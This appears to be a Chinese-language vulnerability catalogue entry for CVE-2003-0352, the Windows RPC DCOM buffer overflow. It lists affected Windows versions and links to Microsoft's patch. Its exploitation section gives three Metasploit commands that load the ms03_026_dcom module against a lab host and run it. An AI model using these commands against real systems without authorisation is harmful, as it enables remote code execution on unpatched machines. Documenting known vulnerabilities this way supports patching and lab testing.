CVE-2003-0352

CVE-2003-0352

描述

某些RPC的DCOM接口中的缓冲区溢出使远程攻击者可以通过格式错误的消息执行任意代码

影响版本

Product	Version	Update	Edition	Tested
Windows 2000
Windows 2000		SP1
Windows 2000		SP2
Windows 2000		SP3
Windows 2000		SP4
Windows 2003 Server	R2		64-bit
Windows 2003 Server	R2		Datacenter 64-bit
Windows 2003 Server	WEB
Windows 2003 Server	Enterprise		64-bit
Windows 2003 Server	Enterprise 64-bit
Windows 2003 Server	Standard		64-bit
Windows Nt	4.0	SP1	Server
Windows Nt	4.0	SP5	Server
Windows Nt	4.0	SP4	Enterprise Server
Windows Nt	4.0		Enterprise Server
Windows Nt	4.0	SP6	Workstation
Windows Nt	4.0	SP2	Workstation
Windows Nt	4.0	SP1	Terminal Server
Windows Nt	4.0	SP5	Terminal Server
Windows Nt	4.0	SP4	Server
Windows Nt	4.0		Server
Windows Nt	4.0	Sp6a	Enterprise Server
Windows Nt	4.0	SP3	Enterprise Server
Windows Nt	4.0	SP5	Workstation
Windows Nt	4.0	SP1	Workstation
Windows Nt	4.0	SP4	Terminal Server
Windows Nt	4.0		Terminal Server
Windows Nt	4.0	Sp6a	Server
Windows Nt	4.0	SP3	Server
Windows Nt	4.0	SP6	Enterprise Server
Windows Nt	4.0	SP2	Enterprise Server
Windows Nt	4.0	SP4	Workstation
Windows Nt	4.0		Workstation
Windows Nt	4.0	Sp6a	Terminal Server
Windows Nt	4.0	SP3	Terminal Server
Windows Nt	4.0	SP6	Server
Windows Nt	4.0	SP2	Server
Windows Nt	4.0	SP1	Enterprise Server
Windows Nt	4.0	SP5	Enterprise Server
Windows Nt	4.0	Sp6a	Workstation
Windows Nt	4.0	SP3	Workstation
Windows Nt	4.0	SP6	Terminal Server
Windows Nt	4.0	SP2	Terminal Server
Windows Xp			64-bit
Windows Xp			Home
Windows Xp		Gold	Professional
Windows Xp		SP1	64-bit
Windows Xp		SP1	Home

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2003-0352

利用方式

测试系统windows 2000 sp4 x86

use exploit/windows/dcerpc/ms03_026_dcom
set RHOST 192.168.1.17
run

查看系统信息